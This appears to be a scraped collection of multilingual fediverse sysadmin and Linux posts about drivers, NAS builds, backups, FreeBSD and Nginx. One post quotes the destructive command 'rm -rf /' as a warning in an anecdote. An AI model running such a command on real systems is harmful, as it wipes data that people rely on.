Anfang März habe ich hier beschrieben, wie ich den NEXT Biometrics NB-2020-U in meinem Fujitsu Notebook unter Linux zum Laufen gebracht habe. Die ganze Arbeit lief am Ende auf eine einzige Product ID hinaus: 0x2020 im bestehenden nb1010 Treiber, weil der NB-2020-U denselben Sensor Die wie der NB-1010-U nutzt. Der Beitrag endete mit dem üblichen Cliffhanger: Merge Request eingereicht, CI grün, warten auf das Review durch die Maintainer.
Das Warten hat ein Ende. MR !569 ist gemergt.
Marco Trevisan, einer der libfprint Maintainer, hat den Patch auf den aktuellen master rebased, die Pipeline noch einmal durchlaufen lassen und ihn am 2. Juli 2026 per Auto-Merge aufgenommen (Commit 0fa670f). Blockierende Review-Kommentare gab es keine. Der Patch war klein und die Beweislage eindeutig: gleicher Sensor, gleiches USB Protokoll, gleicher Treiber, nur eine zusätzliche ID in der Tabelle.
Für alle mit demselben Fingerabdruckleser im Notebook: Ab der nächsten libfprint Version wird der NB-2020-U out of the box erkannt. Kein eigener Patch mehr, kein Selberbauen. Enrollment und Verifikation über fprintd laufen dann direkt, sobald die Distribution die neue libfprint Version ausliefert. Wer nicht warten möchte, nimmt weiterhin den Patch aus dem ersten Beitrag oder baut direkt vom aktuellen master.
Der zweite Leser aus derselben Familie, der NB-2033-U mit seinem komplett eigenen Protokoll, hat einen eigenen Treiber von Grund auf bekommen. Dieser Merge Request !574 liegt noch beim Review, ist aber frisch auf den neuen master rebased und die Pipeline ist grün. Sobald auch der durch ist, folgt ein weiterer kurzer Nachtrag.
Denselben Leser im Notebook oder eine ähnliche Baustelle mit libfprint? Dann einfach fragen.
For all those people building #NAS boxes with huge CPUs and lots of #RAM because that's how Linus (of YouTube not #Linux) did it, I'm running a 50+ TiB NAS on a Celeron N5105 with 8GiB of RAM using #LVM and #XFS.
My highest loads are during backups (borg) when the system hits just 80% idle. Use your precious RAM for gaming.
I managed an e-commerce server for about ten years. It grew from a small local shop into a major national business, even handling international orders. They expanded to the point where they reduced their local brick-and-mortar store hours because the bulk of their revenue was coming from online sales.
Then one seller came along and convinced them that switching to Shopify would be the key to growing even further. Apparently, their €130/month bare-metal redundant setup - which boasted a calculated uptime of 99.995% over 10 years - just wasn't cutting it anymore.
They’ve been on Shopify for about six months now, and every now and then, I still get the alerts. I left the monitoring active via Uptime Kuma and ran the numbers. Over the last six months, their uptime dropped below 98%.
In other words, in just six months, they’ve been down for almost as many hours as they were during the entire previous decade.
I contacted the client - not because I want to take over the hosting again, but just to understand what on earth happened (we're on excellent terms). Their response was: "We don't know, but if it happened on Shopify, it means it was bound to happen anyway."
As long as we keep swallowing the lie that "the cloud" and "tech giants" are always the right solution for us, we completely deserve the cloud and the tech giants.
For all those people building #NAS boxes with huge CPUs and lots of #RAM because that's how Linus (of YouTube not #Linux) did it, I'm running a 50+ TiB NAS on a Celeron N5105 with 8GiB of RAM using #LVM and #XFS.
My highest loads are during backups (borg) when the system hits just 80% idle. Use your precious RAM for gaming.
@cstross @foone I do remember there was an additional wrinkle in that the (donated) box I was trying to install #Slackware onto was a PS/2 and the MCA architecture wasn't officially supported by the Slackware installation disks.
And astonishingly, I think I may have found a copy of the document I had to follow in order to hack the installation to work. https://www.linuxjournal.com/article/2037
Looking back and considering it was my first real experience with installing Linux, it's astonishing I got it to work. But it did, and that machine became my daily driver for the next few years.
boostedFreeBSD 15.1-RELEASE is out.
In my new guide, I walk through the official upgrade paths:
• distribution sets with freebsd-update
• packaged base with pkg
• boot-environment rollback
• .pkgnew merges
• boot-loader checks for UEFI/BIOS
https://blog.hofstede.it/upgrading-freebsd-150-release-to-151-release-the-official-paths/
Hey #InfoSec #SysAdmin folks, anybody heard of ShredOS?
Seems like a potentially useful tool, but the website looks sus:
https://shredos.org/
The GitHub repo seems a bit less sus:
https://github.com/PartialVolume/shredos.x86_64
Edit: the website is not affiliated with the project, see replies. Question stands about the tool itself!
Root-Zugriff ist möglich: Exploits zu CVE-2026-46331 (Linux-Kernel) wurden geleakt und betreffen u.a. Debian, Ubuntu & RHEL. Ein Patch ist teils schon drin, Updates fehlen aber noch nicht überall—Admins sollten schnell absichern. 🔧🚨 https://www.golem.de/news/root-zugriff-moeglich-exploits-fuer-gefaehrliche-luecke-im-linux-kernel-geleakt-2606-210283.html #Linux #Security #CVE #SysAdmin
Haack's Networking - Drawing Tablets & X11/Wayland
🖥️ It is nice to see that my Gaomon tablets work right out of the box under KDE 6.6, Debian 14, and Wayland ...
🎉 Massive thanks to the #wayland #redhat team and also a shout to @davidrevoy who recently dropped his Interim setup which first clued me in to "mouse mode" being on the horizon for stable 💘 (finally)
✅️ Sure enough, in Debian Testing w/ Wayland, the "Drawing Tablet" setting in KDE 6.6 automagically works with the following Gaomon tablets with no proprietary driver installed:
1️⃣ MK 2018
2️⃣ PD 1161
💡 The last two years were choppy and I even had to write a custom X config for the MK 2018 to teach an applied math course. Until recently, seeing no progress on the horizon for "out of the box" functionality, I had settled on @XLibreDev @sonicdesktop and was quite happy. In fact, very grateful to them for getting me by this last year - mucho thanks. #xlibre #sonicde #sonic
🏁 But, at the end of the day, I really need mainstream / stock Debian to just work with drawing products, not just for me ... but for my daughter's art projects - she just got her art accepted at @ffmpeg and I'm very proud of her. We rely on these products - there's no denying. At present:
Dascha uses:
1) X1 Carbon 4th Gen - using KDE neon stable (art attached that she did at 13 for ffmpeg)
2) HP All-In-One Touch i5 - using KDE neon stable
All working better natively in Wayland than under the prop driver. They work similarly well to how they work in X now.
Jonathan (me) uses:
1) 3x mini Ryzen PCs - KDE 6.6, Debian Testing, and Wayland - 1 w/ PD 1161 and 2 w/ MK 2018 - all working including "mouse mode" under wayland / stock Debia (art / teaching).
2) Dell 1950 laptop 2023 i7 w/ NVIDIA - had to manually build the nvidia driver under latest on their website, other than that no issues, running Debian Testing, Wayland, KDE 6.6 - MK 2018 works via USBC hub for teaching
3) X1 Carbon 4th gen i5 - Debian Testing, KDE 6.6, Wayland - works with Wacom stylus similar to Dascha's setup no issues
⁉️ How did this happen? I was fixing an old Precision 7920 and setting it up as a PeerTube runner on Lubuntu 26.04 (better with NVIDIA lol). I got bored and installed Kubuntu Desktop and then pluggeed in an MK 2018. It worked ... & so I started testing and researching KDE point releases & looking back at Mr. Revoy's post and switched all 7 machines over in < 48 hours.
Today, I was doing an upgrade of Percona MySQL server from 8.0 to 8.4.
It took 15-20 minutes to download a 118 MB .deb!
I forgot I had added Percona's repo to apt-mirror on an internal server of ours a few weeks back and forgot to update the web server to serve it so I fixed that.
Whipped up a new "deb822" percona.sources with their signing key but our URL. The result?
It took 1 second to download the percona server .deb.
Host your own .deb repos, folks! You can't count on the 3rd party hosted repo to always be there.
j'ai un nextcloud théière...
Linux tip: `rsync -avz --progress source/ user@host:/destination/` syncs files via SSH with progress display. The `-a` preserves permissions, `-v` is verbose, `-z` compresses during transfer. #Linux #SystemAdministration #SysAdmin
Dear logging and ticketing tools,
if you do not show the time zone for times, you are wrong.
It's like giving coordinates, but not the origin
"over 3 and up 4"
From where? Where I am now? Where I was at the time? I don't know the time because you didn't give a time zone! Heck, you only gave the day within +/- 1
signed,
everybody
PS: when multiple tools do this it's a right pain to build a timeline, you are wasting my time
Als jemand, der viel zwischen Servern, SSH-Sessions und Remote-Hosts jongliert, ist ein gutes Terminal für mich etwas Elementares. Mein persönlicher Favorit ist Termius. Die plattformübergreifende Sync der Hosts und Keys ist Gold wert, SFTP direkt integriert, und das UI macht SSH-Verbindungen endlich weniger nach "Textdatei pflegen und hoffen". Für Teams mit vielen Zugängen ist der Vault-Sync ein echter Zeitgewinn. Und bei euch?
working on #openzfsmastery performance vs resilience section.
Thinking that the fault tolerance of a 3-disk striped VDEV can best be described as "yeet." #sysadmin
This beast is open for sponsorship. https://mwl.io/sponsor
Haack's Networking
✍️ Starting today at 5pm UTC-06/7, the following instances will go down for maintenance:
1) gnulinux.studio
2) gnulinux.media
👀 This maintenance will reduce total core consumption on the host by 8 vCPUs and reduce RAM usage by 16GB. Furthermore, these instances will switch from testing to production usage and public availability.
‼️It is expected that this transition should only take 6-12 hours, however, it could take as long as 72 hours if DNS caching gets delayed. Prepare for down time accordingly.
#sysadmin #selfhosted #linux #freesoftware #opensource #navidrome #jellyfin
boostedNew on the blog: FreeBSD Foundationals #3: The Boot Process
From power-on to login: BIOS vs UEFI, the loader & loader.conf, why a tunable is NOT a sysctl, loading modules the modern way with kld_list, wrangling it all with sysrc, plus a security-hardening baseline.
And the headline act: boot environments. `bectl create` before every upgrade. When freebsd-update or pkg eats your box, you reboot, pick the old BE in the loader menu, and you're back in 30 seconds.
@chessert lol, the scariest lesson I’ve ever learned secondhand was if you’re ever gonna do “rm -rf /” on a Linux server triple check the directory you’re doing that to.
Some new tech at a hosting company I used in the late 90’s deleted the whole server that way. My site was part of the damage.
Underrated reason to have proper SPF setup for all of your hosted domain names to hard fail improper sending routes... when you forget to turn off the mail sender on your dev server and you run a batch action that sends out tens of thousands of emails to users.
I saw my inbox fill up with thousands of email notifications since a lot of the notifications were sent to me. The only reason I'm not panicking is because I looked at the mail headers and saw that because the emails were sent from my computer instead of my server, they failed both SPF and DKIM verification checks so any damage should be limited.
Ugh. 😓
Si la réponse est oui, je pense que vous faites partie du problème, merci de ne plus me suivre.
it turns out that if you auto depend on apt-cacher for the new apt-cacher box on a new network it won't get packages from the apt-cacher you haven't yet installed
And now I know :)
Haack's Networking 
👋 We are live folks ... migrating my personal / business infra from my Data Center to my 8900🧳
🔗 https://content.haacksnetworking.org/w/ddXeefRJ8rw9zeUZRiiRg3
🌅 Come on by and join the fun ... mostly background music on the self-hosted navi while I haack away 😎
Neuer Artikel im Blog: Serielle Konsole bei Debian 🐧
Wer seine VMs virtualisiert hat, kennt das Problem: Man will mal eben draufschauen, aber SSH ist noch nicht bereit oder es lohnt sich nicht extra VNC/SPICE aufzusetzen.
Mit ein paar Anpassungen an GRUB klappt der Zugriff direkt über virsh console – ganz ohne grafische Oberfläche.
Das Vorgehen lässt sich übrigens fast 1:1 auf andere Distributionen übertragen, nur das Kommando zum Neuschreiben von GRUB unterscheidet sich.
🆘Bill Cole 🇺🇦 [Honestly I don’t care but no one will understand if you use she/her.] » 🌐
@grumpybozo@toad.social
@eltonfc Sadly, the days are gone when using a non-standard port is perfect evasion of the cred-stuffers. It's still a good idea, but not adequate.
As others have said, requiring key-based authentication & keeping sshd updated are also essential. You won’t know that the root password has leaked until you regret it. Many people will say it's overkill to prohibit direct root login but I do that as well to hopefully complicate exploitation of new sshd vulnerabilities.
Thank you, @hughsie for all your work on #lvfs and fwupdmgr. Thank you, Lenovo, for supporting firmware and UEFI updates through this mechanism. And thank you, Red Hat, for making all of this readily usable. All my Lenovo Tiny PCs in my homelab are now up2date and can continue to SecureBoot for years to come :)
#TechTipThursday: a few journalctl commands worth keeping handy on Rocky Linux.
journalctl -b -- current boot only
journalctl -f -- follow in real time
journalctl -u sshd -- filter by service
journalctl -p err -- errors and above
New #Nginx is out with security fixes, start your upgrades!
https://nginx.org/en/CHANGES
#SysAdmin #MastoAdmin
looking at the newly available Fluxer self-hosting docs
https://docs.fluxer.app/operator/get-started/#requirements
> At least 2 vCPU, 4 GB RAM, and 20 GB disk. Use 4 vCPU and 8 GB RAM or more for a small active community.
and
> The stack idles around a few GB of memory, and startup is the heaviest point because all service images initialize at once.
mm, not something that will be cheap to self-host.
Workspace 1A window belongs to a single workspace.
Workspace 2
Workspace 3
Firefox -> Tag 1 (Web Browsing)When you view Tag 1, you see your browser and the log monitor. When you
st (nvi/dev) -> Tag 2 (Code/Scripts)
st (Monitor/Logs) -> Tag 1 + Tag 2 (Persistent)
et sinon vous, vous utilisez quoi ?
🎬 Haack's Networking 🎥
✅ We are going live folks‼️
🔗 https://content.haacksnetworking.org/w/qZiaV9nzQ7CyFcrZV9vC1F
✍️ Today, I am testing the new OBS setup. Specifically, video on top of the shared desktop and improved layers. Secondly, getting "background music" working that plays nice with my meteor mic. Additionally, I want to test the new PeerTube transcoding rules (for live) that I added as well as see how much RAM/CPU is used during local recording.
⚡ #gnulinux #linux #selfhosted #peertube #livestream #stream #streaming #debian #sysadmin #floss #freesoftware #opensource ⚡
Come on by just chilling and spinning different tracks! No talking, but chat is open.
Stream: https://content.haacksnetworking.org/w/tgphVpivvkCqyUfWrmSRyp
While reassembling my desk, what if I was to... bear with me here... make the power distribution slightly sane and stop daisy-chaining extension cords? #sysadmin
homelab storage server ready. it just took me 2 years.
- RAID ✅
- mkfs, fstab, etc ✅
- borg ✅
- borg extract ⏳
😴
Review of IP KVMs, device to remote control a Computer from anywhere on your LAN: PiKVM, Sipeed NanoKVM, JetKVM, LuckFox PicoKVM... - Article by Jeff Geerling @geerlingguy #SysAdmin https://www.jeffgeerling.com/blog/2026/i-tested-every-ip-kvm/
Everyone who uses Linux today had a moment where something clicked after way too long.
What's one thing you wish someone had told you when you were starting out?
Drop it in the comments! Someone reading this probably needs exactly what you're about to share.
#RockyLinux #Linux #OpenSource #LearnLinux #SysAdmin #Community
Quick fact: if you've ever streamed content on Netflix, used a PlayStation, or sent a packet through a Juniper router, you've touched FreeBSD.
Learn more about how FreeBSD is used today: https://freebsdfoundation.org/end-user-stories/
Here's a question for the community: what's the longest-running Rocky Linux system you have in production?
Whether it's a homelab server that's been humming along for years or a production box you've never had to think twice about, we want to hear about it. Drop your answer in the comments.
#RockyLinux #OpenSource #Linux #SysAdmin #Community #EnterpriseLinux
Duran Duran - Paper Gods
I share it again with love:
https://gnulinux.studio/app/#/playlist/G8u06fUHtV6PtfJEkCRDQa/show
User: pubglug
Pass: musicisawesome
It's legit solid top to bottom.
I had vinyl of Rio as a kid ... this album tho, it is so consistent and rhythmic.
#music #postpunk #newwave #renewal #music #duranduran #navidrome #jam #sysadmin #selfhosted #selfhost
@bobdobberson 👀 lol
🔥 Grosse refonte sur le wiki !
Tes logs Nginx ressemblent à un mur de texte indigeste ? Il est temps de donner des couleurs à ton terminal ! 🎨🐧
Le guide complet pour coloriser les logs Nginx a reçu une énorme mise à jour. Plus clair, plus efficace, c'est par ici que ça se passe 👇
🔗 https://wiki.blablalinux.be/fr/coloriser-logs-nginx-terminal
boostedI packed and moved hurriedly but even so, I'm proud that I held the number of keyboards I brought to a bare minimum. #sysadmin
Le guide IPv6 (#OVH / #NPM / #Proxmox / #Docker) fait peau neuve !
Vous connaissez déjà cette page de mon wiki, mais elle vient de s'offrir une réécriture complète !
Pourquoi ? Pour couvrir proprement deux cas de figure bien distincts selon vos besoins. Que vous soyez dans une config ou dans l'autre, tout y est détaillé pas à pas.
👉 À checker et à mettre dans vos favoris ici : https://wiki.blablalinux.be/fr/deploiement-ipv6-ovh-npm-proxmox-docker
Bonne lecture et bon déploiement !
Yesterday an old friend asked me of the impact AI is having on my #sysadmin work, whether I was using it. I responded that it was not, & that using it would be unproductive as I'd lose so much time auditing deployments by an agent I cannot trust for slop, bloat & flaws.
What I didn't have time to add was that I already have v low carbon, 100% sovereign automation I can trust: shell scripts. I know exactly what they do, when & why, because I wrote them. Such value & confidence is irreplaceable.
2.5 Admins 300: IPvWot?
Why a proposal for an alternative to IPv6 is unlikely to be viable, Microsoft really doesn't want you to run Exchange Server on-prem, Google will finally stop being a proper search engine, setting up an email server for internal use, and mitigating DDoS attacks without Cloudflare.
I just wrote a little bash script to help automate live VM migrations between hypervisors (using libvirt/kvm/qemu style virtualization).
I really miss being able to focus on this kind of progress with my infra. Chasing money gets tiring... I just want to build cool things that people will use.
Marre des logs NPM tout gris ? Je vous ai préparé une nouvelle variante de colorisation pour votre terminal !
Un coup de Bash et hop, tout devient plus clair à repérer :
🔵 IP client
🟢 Pays OK
🔴 Pays bloqué
🟡 Domaine
🟣 Code HTTP
Le code est ici 👇
👉 https://privatebin.blablalinux.be/?41ae048c9c122ae7#CSodkfFCWSUEgwiSe2Ekt5GcmEhy2zQxXeAfn2kntdui
🗄️ Enterprise-Backup für einen 20TB Ubuntu-Fileserver — IBM Spectrum Protect in einer Session! 🚀
~20 Interaktionen, ca. 15 Minuten. Ergebnis:
▫️ TSM BA-Client 8.1.27 installiert (GSKit + API + Client)
▫️ dsm.sys/dsm.opt konfiguriert
▫️ tsm.sh — prüft Installation, Konfiguration, Server-Verbindung, Node-Registrierung, letztes Backup
▫️ In check-all.sh integriert → läuft täglich mit
▫️ Erkennt automatisch: Node nicht registriert? Server erreichbar? Backup gelaufen?
Warum wichtig? 20TB Fileserver ohne Backup ist kein Storage — es ist ein Zeitbomben-Experiment. 💣
TSM ist der Standard in Unis/Rechenzentren: dedupliziert, verschlüsselt, inkrementell-forever. Der Client checkt jetzt bei jedem Hardware-Check gleich mit ob das Backup lebt.
Tech-Stack: Ubuntu 26.04, IBM Spectrum Protect 8.1.27, DEB-Pakete von IBM DHE, Bash-Monitoring, opencode AI
#Linux #SysAdmin #Backup #TSM #SpectrumProtect #FileServer #Automation
Aggressive caching for a Mastodon reverse proxy: what to cache, what to never cache, and why content negotiation will eventually betray you
The same URL serves HTML to browsers, JSON to apps, and ActivityPub to remote instances. Here's how I cache Mastodon with nginx without betraying any of them.
https://it-notes.dragas.net/2026/06/05/aggressive_caching_for_a_mastodon_reverse_proxy/
#ITNotes #nginx #Caching #IT #SysAdmin #Mastodon #Fediverse #BSDCafe
📱 Même sur mobile, ça pète ! 🚀
Tu as déjà vu passer ma nouvelle coloration de logs sur le wiki ? Voilà ce que ça donne en plein écran sur smartphone avec le script live-ext : un vrai confort visuel avec ses couleurs néon ! 🟣🟢
Pour choper le code mis à jour ou revoir le guide complet, c'est par ici :
👉 Le script fluo : https://privatebin.blablalinux.be/?b6f675e146e55782#7Ug4YDhJT1dfsvwGrZKYJLhwJnZ5AGhrB6gnKgzRBHq2
👉 Le tuto du wiki : https://wiki.blablalinux.be/fr/coloriser-logs-nginx-terminal
2.5 Admins 302: ClawPilot
Microsoft threatens a security researcher for disclosing vulnerabilities publicly, bricks old versions of Office, and announces their version of OpenClaw. Plus keeping up with the latest technology.
"Aggressive caching for a Mastodon reverse proxy: what to cache, what to never cache, and why content negotiation will eventually betray you"
A 34 min read
Coming tomorrow, on IT Notes!
#ITNotes #StayTuned #Mastodon #Fediverse #nginx #IT #SysAdmin
👉 Le code complet et les détails sont ici : https://privatebin.blablalinux.be/?b6f675e146e55782#7Ug4YDhJT1dfsvwGrZKYJLhwJnZ5AGhrB6gnKgzRBHq2
Mais après quelques sueurs froides, tout est corrigé, stable et 100 % au vert ! 🟢✨ Le plaisir ultime de voir le panneau d'administration tout propre.
Et chez vous, ça se passe comment les updates ? 💻☕
#SysAdmin #Nextcloud #Ubuntu #Debian #LXC #SelfHosted #BlablaLinux
🐧 Hardware-Monitoring für einen Ubuntu-Fileserver — in einer Session gebaut! 🚀
~50 Interaktionen, ca. 30 Minuten. Ergebnis:
▫️ sensors.sh — CPU (Package + 6 Cores), NVMe, ACPI Temps
▫️ disks.sh — SMART für HDD (20TB Exos) + NVMe SSD
▫️ system.sh — CPU, RAM (DDR5-Slots!), GPU, BIOS, Mainboard via dmidecode
▫️ mergerfs.sh — Pool-Übersicht: Belegung, Inodes, Berechtigungen
▫️ updates.sh — apt update/upgrade + Neustart-Check
▫️ check-all.sh — Master-Script, läuft alles durch
▫️ mail.sh — Mail-Versand via SMTP
▫️ Custom opencode Skill „log-summary" — liest Log, fasst zusammen, sendet per Mail
▫️ Cron-Job: täglich 01:00 → Check → Zusammenfassung → Mail 📧
Jeden Morgen eine kompakte Übersicht im Postfach — alle Temperaturen einzeln, SMART-Status, Storage, Updates. Nur Alarme wenn was nicht stimmt.
Tech-Stack: Ubuntu 26.04, smartmontools, lm-sensors, dmidecode, mergerfs, opencode AI, Python smtplib, cron
#Linux #SysAdmin #Monitoring #HomeLab #mergerfs #SMART #OpenSource #Automation
thanks to: #qwen36plus
In other news, I've spent hours today dealing with the fact that Spamhaus says there's malware sending spam from the IPv6 range which is supposedly reserved by Akamai for my mail server.
So far I can't find any evidence that my server is compromised, but I've jerryrigged a monitor that will tell me if any processes other than sendmail are making outbound port 25 connections, so I'm hoping if it happens again that'll help me find it.
It's always something. *sigh*
#infosec #sysadmin
Dear #lazyweb,
I'm finding myself in a discussion that a partner expects their system to run in local timezone (Europe/Berlin), while we sysadmins have configured the whole fleet as UTC (as one should do).
I remember an article that explains why, for SQL servers, #UTCorGTFO. The latter has obviously a wide audience ( https://wiert.me/2022/11/08/utc-and-iso-8601-or-gtfo/, https://www.netmeister.org/blog/ops-lessons.html), but I fail to find any structured reasoning why UTC is the best choice.
Can you help me out?
🐧 Ubuntu Fileserver in eine Windows-Domäne integriert — und es war satisfying! 🚀
Was wir gebaut haben:
▫️ Domänenbeitritt via realmd/SSSD zu Active Directory
▫️ mergerfs-Pool: 374 GB NVMe + 18 TB HDD = ~18,5 TB vereinter Storage
▫️ Samba als Domain Member mit winbind ID-Mapping
▫️ ACL-Support für Windows-kompatible Berechtigungen
▫️ AD-Gruppen steuern den Zugriff auf Freigaben
Das Besondere: mergerfs lässt jede Platte einzeln ansprechbar. Bei Plattenausfall sind nur die Daten darauf weg — kein RAID-Overhead, dafür TSM-Backup pro Platte. Perfekt für Cold Data.
Samba läuft mit acl_xattr, NTFS-ACLs werden als xattr auf ext4 gespeichert. Windows-Clients verbinden sich nahtlos mit Domänen-Credentials.
Der i5-12400 langweilt sich dabei mit 90% Idle. 📉
Tech-Stack: Ubuntu 26.04, realmd, SSSD, Samba, winbind, mergerfs, ext4
#Linux #Samba #ActiveDirectory #FileServer #mergerfs #SysAdmin #OpenSource
thanks n credits to: #qwen36plus
=)
Sysadmins of the Fediverse, I'm curious what people consider to be a 'large fleet' of servers to operate (physical or virtual), so here's a poll.
(Boosts welcome, as are replies if you think other factors matter or if it differs between physical and virtual.)
| 10 systems is large/lots: | 0 |
| 50 systems is large/lots: | 1 |
| 100 systems is large/lots: | 3 |
| 500 systems is large/lots: | 1 |
Petit rappel utile : Nginx Proxy Manager fait aussi office de bouclier ! 🛡️
Pratique pour verrouiller les fichiers sensibles et ne laisser passer que le LAN et les IP de confiance. Simple, rapide, efficace.
🚀 BackupPilot Beta 6 verfügbar
Neu mit Unterstützung für Zertifikats-Fingerprints bei selbstsignierten Zertifikaten, weiteren Verbesserungen und Paketen für Debian/Ubuntu (.deb), Fedora/RHEL/Rocky/AlmaLinux (.rpm) sowie Flatpak.
🔍 Tester gesucht!
Wir suchen Feedback zu Installation, Bedienung sowie Backup- und Wiederherstellungsfunktionen auf möglichst vielen Linux-Distributionen.
📦 Download:
https://files.onesystems.ch/backuppilot
#Proxmox #PBS #Linux #Backup #OpenSource #BackupPilot #SysAdmin #unplug
⌨️ Gagne du temps sur ton terminal !
Je partage mon fichier d'alias Bash pour administrer Nginx Proxy Manager, Fail2Ban et GeoIP en un clin d'œil.
👉 https://wiki.blablalinux.be/fr/alias-bash-npm-fail2ban-geoip 🚀
#Linux #Bash #SysAdmin #Nginx #Productivité
Avis de tempête sur le serveur !
Quand le géoblocage IPv6 passe à la vitesse supérieure, ça donne ça : un joli mur d'IP qui n'iront pas plus loin ❌
Sécurité max en place, mes conteneurs respirent ! 🛡️
#SelfHosting #IPv6 #SysAdmin #Securite #Geoblocking #OpenSource
L'analyse complète et l'exemple sont ici 👇
🔗 https://wiki.blablalinux.be/fr/blocage-bots-scraping-nginx-proxy-manager
At 19:00 I receive a notification: the backup server has problems. I log in and check: a drive had died. No big deal; since it's a RAIDZ1, the system kept running. I had already copied the EFI partitions and set things up, so it would be able to boot from the other drives as well. I request a replacement from Hetzner, which they carry out in less than half an hour. Despite being hot-swappable, the server detects the disconnection of another drive and crashes. At that point, I ask them to look into it, and they test the machine. Reboot: it won't start. I request a KVM console. I get it: I had forgotten to update the fstab and it was trying to mount /boot/efi from ada0p1, but ada0 was the replaced drive, and it wouldn't go any further.
Fixed the fstab, recreated the partitions, rebooted, and issued the ZFS command for resilvering.
Result: resilvering in progress and backups working again.
I can turn off the computer and start my Friday evening.
Avis aux fans de Proxmox !
La version 1.1 de Proxmox Datacenter Manager vient de sortir ! Si vous gérez plusieurs clusters et que vous rêviez d'avoir des super-pouvoirs pour tout centraliser au même endroit (et avec style), c'est le moment de jeter un œil.
Toutes les nouveautés sont ici :
👉 https://proxmox.com/en/about/company-details/press-releases/proxmox-datacenter-manager-1-1
#Proxmox #SysAdmin #OpenSource #Datacenter
🛜 GNU/Linux Social has open registration.
Register➡️ https://gnulinux.social
Requirements:
- accounts must be of and about free software and its surrounding culture and background
- modest personal and/or recreational use is allowed, e.g., art, music, pics of fam, etc.
- companies/businesses are allowed only if they are floss
- follow full ToS/CoC
Already a member? Want to give back?
Donate ▶️ https://liberapay.com/oemb1905/
#mastodon #twitter #x #opensource #sysadmin #selfhost #linux #gnulinux
reaction v2.4.0 is out!
Updates:
- JSON log parsing (much handier than regexes for JSON logs!)
- Smarter database
- Important bugfixes
https://framagit.org/ppom/reaction/-/releases/v2.4.0
#reactionrust #reaction #sysadmin #rust
Personal computing safety goals because of supply chain attacks and possible future issues: create new user account for new projects, clone and test repos in that account only.
Is it hard? No. Could I automate it? maybe. Would it be nice to have built into say conda? Absolutely.
#cybersecurity #programming #supplyChainAttack #Linux #sysadmin
🐧 Looking for a community to discuss #GNU or #Linux?
🤨 Looking for a community #matrix @element instance to use for secure communications?
Register: https://element.gnulinux.club
GNU/Linux Club serves #gnulinux enthusiasts & #copyleft fans.
Requirements:
- Official git profile or tech blog
- Be 18 years of age or older
- Remain active in the pubglug channel
- Follow the ToS & CoC
🫶Donations➡️https://liberapay.com/oemb1905/
#gnulinux #sysadmin #selfhosted #debian #opensource #element
🤔Are you an #opensource or #floss content creator?
👀Are you an #opensource or #floss organization that needs a place to host your meetups/presentations?
🔥GNU/Linux Tube has open registration‼️
- 10GB daily upload default
- 100GB video quota default
- Custom vp9 & opus CPU transcoding
- Quarterly updates & maintenance
- All volunteer devs @sen @oemb1905
Donate: https://liberapay.com/oemb1905/
FediMeteo, timezones, and the art of not breaking what already works
From a simple Italian script to managing 1200+ US cities, timezones, and a secret-leaking crisis. How I completely rebuilt the FediMeteo backend without breaking the Unix-style infrastructure around it.
Most importantly, so I have notes so I can manually do it again... but also considering writing a bash shell script to mostly automate.
If I do that, it would be one of the longest and most ambitious shell scripts I've done. A little intimidating, but I think I'll be able to pull it off.
Probably will save a lot of time later. And even if it doesn't, I will have learned quite a bit.
🎙️ Marre de perdre la connexion avec tes potes sur Mumble à cause d'une IP dynamique ? 🔄❌
Pas besoin de passer par un service de DynDNS tiers ou une usine à gaz ! Dans ce nouveau guide sur le Wiki, on voit comment automatiser proprement la mise à jour de ton IP publique pour que ton serveur Mumble reste toujours joignable, quoi qu'il arrive 🛠️📡
👉 Le tuto est dispo ici : https://wiki.blablalinux.be/fr/mise-a-jour-automatique-ip-serveur-mumble
Bonne lecture et bon déploiement ! 💯
#Mumble #SelfHosted #SysAdmin #Linux #OpenSource
For the record, I'm fully supportive of #floss and/or #opensource #AI - it's essentially free form input statistical software. Use it wisely, be aware of.confirmation bias, use to augment (not replace) or simplify repetitive/tedious work, etc. Support models and companies that encourage this responsible usage. Model it yourself and disclose responsible usage transparently. #sysadmin It's not difficult, really.
For my shop machine, I'm now actively testing Debian 14 Testing w/ Xlibre and SonicDE. So far, so good. I use this machine for client work and it also gets to be my guinea pig for testing drawing tablet workflows. Both native Xlibre (via wacom) and Gaomon's proprietary driver work. I'm impressed with how snappy SonicDE is - first time using it today. Great work folks‼️
@sonicdesktop @XLibreDev #xlibre #freesoftware #opensource #debian #sysadmin #floss #sonicde
Ces pages sont juste là pour t'aider à piger rapidement à quoi on a affaire et comprendre en un coup d'œil ce que proposent concrètement ces outils. Idéal pour faire le tour du propriétaire en 2 minutes chrono ⚙️🚀
👉 Découvre ça sur le Wiki : https://wiki.blablalinux.be
Bonne lecture ! 💯
#Proxmox #PegaProx #ProxCenter #SysAdmin #SelfHosted #OpenSource
@zwol @fuzzyfuzzyfungus @0xabad1dea it's absolutely possible. Apache does it. Qmail did it. Nothing you're writing is more complex than those. Drop privileges. Run every service as a different user. Use mandatory access controls. The tools exist.
#sysadmin #programming #security #cybersecurity
🖥️ Besoin d'une interface sympa pour gérer tes conteneurs Proxmox ? Découvre PegaProx !
J'ai partagé le fichier Docker Compose complet sur mon instance ByteStash, et cerise sur le gâteau : la configuration complète NPM (Nginx Proxy Manager) est présente pour te simplifier la vie à 100 %. Déploiement propre et rapide garanti ! ⚙️🚀
👉 Récupère le snippet ici : https://bytestash.blablalinux.be/s/0b91443745c9ac614bd6b96bf944a546
Bon test et bon déploiement ! 💯
#Proxmox #Docker #NginxProxyManager #ByteStash #SelfHosted #SysAdmin #OpenSource
💥 Avoir des sauvegardes c'est bien, être SÛR qu'elles fonctionnent, c'est mieux ! 💥
Marre de croiser les doigts en espérant que tes dumps SQL soient valides le jour du crash ? 🤞❌
Dans ce nouveau guide étape par étape sur le Wiki, on met en place la vérification automatique des restaurations de tes bases de données avec Databasus. Dormez sur vos deux oreilles ! 😴🛡️
👉 Le guide complet est ici : https://wiki.blablalinux.be/fr/verification-automatique-restaurations-databasus
Bon déploiement ! ⚙️
Le post-quantique, ce n’est pas juste un sujet de labo.
Côté infra, la vraie question c’est plutôt :
qu’est-ce qui, chez moi, doit rester confidentiel dans 10 ou 20 ans ?
Backups, VPN, SSH, certificats, archives longues durées… j’ai essayé de remettre ça à plat ici :
https://cryptolab.re/posts/2026/post-quantum-readiness-guide-for-sysadmins/
en tous cas ca a l'air d'un super poste !
Octopuce recrute une administratrice ou un administrateur système Linux.
Toutes les informations sont là :
https://www.octopuce.fr/octopuce-recrute-une-administrateurtrice-systeme/
Faites tourner, le retoot amène du travail aux copaines 🐙🥰
#jerecrute #sysadmin #adminsys
